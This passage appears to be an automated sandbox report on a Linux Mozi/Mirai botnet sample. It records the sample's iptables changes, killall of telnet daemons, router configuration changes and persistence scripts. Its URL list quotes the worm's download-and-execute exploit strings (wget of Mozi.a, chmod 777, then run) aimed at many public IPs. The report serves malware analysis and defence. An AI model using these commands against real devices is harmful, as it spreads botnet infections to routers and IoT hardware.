              Source: /usr/bin/killall (PID: 4602)File opened: /proc/271/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/151/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/152/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/153/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/395/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/396/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/154/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/155/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/156/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/1017/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/157/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/158/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/159/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3432/stat
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/3432/cmdline
              Source: /usr/bin/killall (PID: 4602)File opened: /proc/50/stat
              Source: /tmp/mozi.a.zip (PID: 4600)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
              Source: /tmp/mozi.a.zip (PID: 4634)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4668)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4671)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4711)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4732)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4741)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4764)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4789)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 4811)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4814)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4818)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4838)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4865)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
              Source: /tmp/mozi.a.zip (PID: 4875)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
              Source: /tmp/mozi.a.zip (PID: 4887)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4911)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4938)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4960)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4978)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 4998)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5015)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5034)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5053)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5072)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5087)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5113)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
              Source: /tmp/mozi.a.zip (PID: 5217)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5220)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5223)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5233)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5255)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5282)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5306)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT"
              Source: /tmp/mozi.a.zip (PID: 5332)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT"
              Source: /bin/sh (PID: 4638)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Source: /tmp/mozi.a.zip (PID: 4625)Reads from proc file: /proc/statJump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /usr/networks (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)Jump to behavior
              Source: /tmp/mozi.a.zip (PID: 4598)File written: /usr/networksJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)Shell script file created: /etc/rcS.d/S95baby.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)Shell script file created: /etc/init.d/S95baby.shJump to dropped file
              Source: submitted sampleStderr: telnetd: no process foundutelnetd: no process foundscfgmgr: no process foundUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705/bin/sh: 1: cfgtool: not found/bin/sh: 1: cfgtool: not foundqemu: uncaught target signal 11 (Segmentation fault) - core dumpedUnsupported ioctl: cmd=0xffffffff80045705Unsupported ioctl: cmd=0xffffffff80045705: exit code = 0

              Hooking and other Techniques for Hiding and Protection:

              barindex
              Drops files in suspicious directoriesShow sources
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/S95baby.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountall.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/checkfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/umountnfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountkernfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/checkroot-bootclean.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountnfs-bootclean.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/bootmisc.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/checkroot.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/hwclock.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/hostname.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountdevsubfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountall-bootclean.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /etc/init.d/mountnfs.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /usr/bin/gettext.shJump to dropped file
              Source: /tmp/mozi.a.zip (PID: 4598)File: /usr/sbin/alsa-info.shJump to dropped file
              Uses known network protocols on non-standard portsShow sources
              Source: unknownNetwork traffic detected: HTTP traffic on port 56274 -> 52869
              Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 56274
              Source: unknownNetwork traffic detected: HTTP traffic on port 45556 -> 49152
              Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 45556
              Source: unknownNetwork traffic detected: HTTP traffic on port 39288 -> 49152
              Source: unknownNetwork traffic detected: HTTP traffic on port 49152 -> 39288
              Source: /tmp/mozi.a.zip (PID: 4580)Queries kernel information via 'uname':
              Source: /tmp/mozi.a.zip (PID: 4598)Queries kernel information via 'uname':
              Source: /tmp/mozi.a.zip (PID: 4621)Queries kernel information via 'uname':
              Source: /sbin/modprobe (PID: 4652)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 5181)Queries kernel information via 'uname':
              Source: /usr/share/apport/apport-gtk (PID: 5208)Queries kernel information via 'uname':
              Source: kvm-test-1-run.sh.8.drBinary or memory string: ( $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append "$qemu_append $boot_args"; echo $? > $resdir/qemu-retval ) &
              Source: functions.sh0.8.drBinary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
              Source: kvm-test-1-run.sh.8.drBinary or memory string: kill -KILL $qemu_pid
              Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
              Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
              Source: kvm.sh.8.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
              Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_pid=$!
              Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
              Source: functions.sh0.8.drBinary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
              Source: kvm-recheck-lock.sh.8.drBinary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
              Source: kvm-test-1-run.sh.8.drBinary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
              Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
              Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
              Source: kvm.sh.8.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
              Source: functions.sh0.8.drBinary or memory string: identify_qemu_append () {
              Source: kvm-test-1-run.sh.8.drBinary or memory string: echo Grace period for qemu job at pid $qemu_pid
              Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
              Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="-enable-kvm -soundhw pcspk -nographic $qemu_args"
              Source: functions.sh0.8.drBinary or memory string: # Returns our best guess as to which qemu command is appropriate for
              Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
              Source: kvm-test-1-run.sh.8.drBinary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
              Source: kvm-test-1-run.sh.8.drBinary or memory string: QEMU="`identify_qemu $builddir/vmlinux`"
              Source: functions.sh0.8.drBinary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
              Source: functions.sh0.8.drBinary or memory string: identify_qemu_args () {
              Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $builddir/console.log
              Source: functions.sh0.8.drBinary or memory string: qemu-system-x86_64|qemu-system-i386)
              Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
              Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate -smp qemu argument.
              Source: kvm-test-1-run.sh.8.drBinary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
              Source: functions.sh0.8.drBinary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
              Source: functions.sh0.8.drBinary or memory string: # Output arguments for the qemu "-append" string based on CPU type
              Source: kvm.sh.8.drBinary or memory string: --qemu-args|--qemu-arg)
              Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
              Source: functions.sh0.8.drBinary or memory string: echo $TORTURE_QEMU_CMD
              Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC=$2
              Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
              Source: kvm-test-1-run.sh.8.drBinary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid \([0-9]*\).*$/\1/p" $resdir/Warnings`"
              Source: functions.sh0.8.drBinary or memory string: specify_qemu_cpus () {
              Source: kvm-test-1-run.sh.8.drBinary or memory string: vcpus=`identify_qemu_vcpus`
              Source: functions.sh0.8.drBinary or memory string: echo qemu-system-ppc64
              Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
              Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-args "-qemu args" $# "$2" '^-' '^error'
              Source: functions.sh0.8.drBinary or memory string: qemu-system-ppc64)
              Source: functions.sh0.8.drBinary or memory string: # identify_boot_image qemu-cmd
              Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_ARG="$2"
              Source: kvm-recheck-rcu.sh.8.drBinary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
              Source: functions.sh0.8.drBinary or memory string: # identify_qemu_append qemu-cmd
              Source: functions.sh0.8.drBinary or memory string: identify_qemu_vcpus () {
              Source: functions.sh0.8.drBinary or memory string: # qemu-args already contains "-smp".
              Source: kvm-test-1-run.sh.8.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
              Source: functions.sh0.8.drBinary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
              Source: functions.sh0.8.drBinary or memory string: echo Cannot figure out what qemu command to use! 1>&2
              Source: functions.sh0.8.drBinary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
              Source: functions.sh0.8.drBinary or memory string: # identify_qemu_vcpus
              Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_CMD="$2"
              Source: functions.sh0.8.drBinary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
              Source: functions.sh0.8.drBinary or memory string: # identify_qemu_args qemu-cmd serial-file
              Source: functions.sh0.8.drBinary or memory string: if test -n "$TORTURE_QEMU_CMD"
              Source: kvm.sh.8.drBinary or memory string: --qemu-cmd)
              Source: kvm.sh.8.drBinary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
              Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args=$5
              Source: kvm-test-1-run.sh.8.drBinary or memory string: echo $QEMU $qemu_args -m 512 -kernel $resdir/bzImage -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
              Source: kvm-test-1-run.sh.8.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$builddir/console.log"`"
              Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate qemu -append arguments
              Source: functions.sh0.8.drBinary or memory string: # identify_qemu builddir
              Source: functions.sh0.8.drBinary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
              Source: kvm-test-1-run.sh.8.drBinary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
              Source: functions.sh0.8.drBinary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
              Source: kvm.sh.8.drBinary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
              Source: functions.sh0.8.drBinary or memory string: echo qemu-system-i386
              Source: functions.sh0.8.drBinary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
              Source: functions.sh0.8.drBinary or memory string: echo qemu-system-x86_64
              Source: functions.sh0.8.drBinary or memory string: identify_qemu () {

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsCommand and Scripting Interpreter1.bash_profile and .bashrc1.bash_profile and .bashrc1Masquerading1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Standard Port11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScripting12At (Linux)1At (Linux)1File and Directory Permissions Modification1Brute Force1Remote System Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)1Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerSystem Network Configuration Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol5Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSFile and Directory Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol5SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 349551 Sample: mozi.a.zip Startdate: 06/02/2021 Architecture: LINUX Score: 100 91 185.68.99.43, 5555 WEBGURUNL Netherlands 2->91 93 152.125.208.240, 49152 VA-TMP-COREUS United States 2->93 95 103 other IPs or domains 2->95 99 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->99 101 Antivirus detection for dropped file 2->101 103 Antivirus / Scanner detection for submitted sample 2->103 105 7 other signatures 2->105 12 mozi.a.zip 2->12         started        14 upstart sh 2->14         started        16 upstart sh 2->16         started        18 upstart sh 2->18         started        signatures3 process4 process5 20 mozi.a.zip 12->20         started        22 sh date 14->22         started        24 sh apport-checkreports 14->24         started        26 sh date 16->26         started        28 sh apport-gtk 16->28         started        30 sh date 18->30         started        32 sh apport-gtk 18->32         started        process6 34 mozi.a.zip 20->34         started        file7 83 /usr/sbin/alsa-info.sh, ASCII 34->83 dropped 85 /usr/networks, ELF 34->85 dropped 87 /usr/bin/gettext.sh, ASCII 34->87 dropped 89 21 other malicious files 34->89 dropped 107 Sample tries to persist itself using /etc/profile 34->107 109 Drops files in suspicious directories 34->109 111 Sample reads /proc/mounts (often used for finding a writable filesystem) 34->111 113 Sample tries to persist itself using System V runlevels 34->113 38 mozi.a.zip 34->38         started        41 mozi.a.zip sh 34->41         started        43 mozi.a.zip sh 34->43         started        45 30 other processes 34->45 signatures8 process9 signatures10 119 Opens /proc/net/* files useful for finding connected devices and routers 38->119 47 mozi.a.zip sh 38->47         started        49 mozi.a.zip sh 38->49         started        51 mozi.a.zip sh 38->51         started        62 5 other processes 38->62 53 sh killall 41->53         started        56 sh iptables 43->56         started        58 sh iptables 45->58         started        60 sh iptables 45->60         started        64 21 other processes 45->64 process11 signatures12 66 sh iptables 47->66         started        69 sh iptables 49->69         started        71 sh iptables 51->71         started        115 Terminates several processes with shell command 'killall' 53->115 117 Executes the "iptables" command to insert, remove and/or manipulate rules 56->117 73 sh iptables 62->73         started        75 sh iptables 62->75         started        77 sh iptables 62->77         started        79 2 other processes 62->79 process13 signatures14 97 Executes the "iptables" command to insert, remove and/or manipulate rules 66->97 81 iptables modprobe 66->81         started        process15

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              mozi.a.zip66%VirustotalBrowse
              mozi.a.zip54%MetadefenderBrowse
              mozi.a.zip68%ReversingLabsLinux.Trojan.Mirai
              mozi.a.zip100%AviraLINUX/Mirai.lldau

              Dropped Files

              SourceDetectionScannerLabelLink
              /usr/networks100%AviraLINUX/Mirai.lldau
              /usr/networks54%MetadefenderBrowse
              /usr/networks68%ReversingLabsLinux.Trojan.Mirai

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://13.89.231.175:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://pastebin.ca)0%Avira URL Cloudsafe
              http://%s:%d/bin.sh;chmod0%Avira URL Cloudsafe
              http://%s:%d/Mozi.a;chmod0%Avira URL Cloudsafe
              http://127.0.0.1:80/GponForm/diag_Form?images/0%Avira URL Cloudsafe
              http://180.254.107.55:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://175.203.81.2:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;$0%Avira URL Cloudsafe
              http://23.12.191.118:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://127.0.0.10%Avira URL Cloudsafe
              http://193.248.153.76:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://www.alsa-project.org0%Avira URL Cloudsafe
              http://23.254.64.88:80/HNAP1/0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m0%Avira URL Cloudsafe
              http://www.alsa-project.org/cardinfo-db/0%Avira URL Cloudsafe
              http://127.0.0.1sendcmd0%Avira URL Cloudsafe
              http://159.140.205.214:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://34.66.226.190:80/HNAP1/0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;/tmp/Mozi.m0%Avira URL Cloudsafe
              http://%s:%d/bin.sh0%Avira URL Cloudsafe
              http://47.246.22.230:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://144.76.43.37:80/HNAP1/0%Avira URL Cloudsafe
              http://24.239.192.38:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://purenetworks.com/HNAP1/0%Avira URL Cloudsafe
              http://72.200.237.136:49152/soap.cgi?service=WANIPConn10%Avira URL Cloudsafe
              http://www.alsa-project.org/alsa-info.sh0%Avira URL Cloudsafe
              http://%s:%d/Mozi.m;0%Avira URL Cloudsafe
              http://23.217.12.208:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://23.236.242.26:80/shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws0%Avira URL Cloudsafe
              http://www.alsa-project.org.0%Avira URL Cloudsafe
